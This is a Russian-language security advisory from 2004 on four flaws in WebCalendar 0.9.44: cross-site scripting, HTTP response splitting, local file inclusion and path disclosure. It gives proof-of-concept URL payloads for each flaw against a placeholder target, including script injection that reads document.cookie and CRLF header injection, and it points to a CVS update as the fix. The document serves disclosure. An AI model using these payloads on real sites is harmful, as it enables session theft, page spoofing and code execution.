Дата публикации: | 13.11.2004 |
Всего просмотров: | 1535 |
Опасность: | Высокая |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: WebCalendar 0.9.44
Описание: 1. Межсайтовое выполнение сценариев возможно из-за некорректной фильтрации HTML кода в тэгах IMG. Удаленный атакующий может сформировать специальным образом URL и выполнить произвольный HTML сценарий в браузере целевого пользователя. Пример: http://[target]/demo/view_entry.php?id=41972"><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javas http://[target]/demo/view_d.php?id=657"><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript: http://[target]/demo/usersel.php?form=editentryform.elements[20]; http://[target]/demo/datesel.php?form=editentryform.elements[20].rpt_day.selectedIndex%20=%20day%20-%201;alert(document.cookie);//" http://[target]/demo/datesel.php?form=editentryform&fday=rpt_day"%20onclick=javascript:alert(document.cookie)>&fmonth=&t http://[target]/demo/includes/trailer.php?user="><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=ja; http://[target]/demo/includes/styles.php?FONTS=asdf}%0A--></style><script>alert(document.cookie)</script&a Все глобальные параметры уязвимы. 2. Удаленный атакующий может произвести атаку Response slitting и подменить содержимое страницы. Уязвимый сценарий – login.php. Пример:
http://[target]/demo/login.php?re turn_path=%0d%0aContent-Length:0%0d%0a%0d%0aHTTP/1.1 3. Локальный пользователь может создать файл в доступной web серверу директории, и затем с помощью специально сформированного URL выполнить его. Пример: http://[target]/demo/includes/init.php?user_inc=the_file_that_you_upload_via_ftp_or_other 4. Удаленный атакующий может получить данные о пути к установочной директории приложения на сервере с помощью специально сформированного URL. Пример: http://[target]/demo/includes/validate.php?encoded_login= URL производителя: webcalendar.sourceforge.net Решение: Установите обновление, доступное по CVS. |
|
Ссылки: | WebCalendar Grants Administrative Access and Permits Cross-Site Scripting and HTTP Response Splitting Attacks |